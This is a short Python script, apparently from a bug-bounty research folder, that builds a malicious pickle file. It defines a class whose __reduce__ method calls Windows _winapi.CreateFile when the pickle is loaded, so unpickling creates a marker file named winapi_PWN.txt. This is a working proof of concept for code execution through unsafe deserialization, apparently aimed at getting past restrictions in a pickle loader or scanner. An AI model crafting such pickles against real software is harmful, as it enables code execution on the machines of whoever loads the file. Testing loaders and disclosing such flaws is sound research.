File size: 315 Bytes
22dacd2 | 1 2 3 4 5 6 7 8 | import pickle, _winapi
OUT = r"D:\0projects\bountykimi\tmp\artifacts\winapi_createfile.pkl"
class E:
def __reduce__(self):
return (_winapi.CreateFile, (r"C:/Users/uozer/AppData/Local/Temp/opencode/winapi_PWN.txt", 0x40000000, 0, 0, 2, 0x80, 0))
pickle.dump({"e": E()}, open(OUT, "wb"))
print("gen ok")
|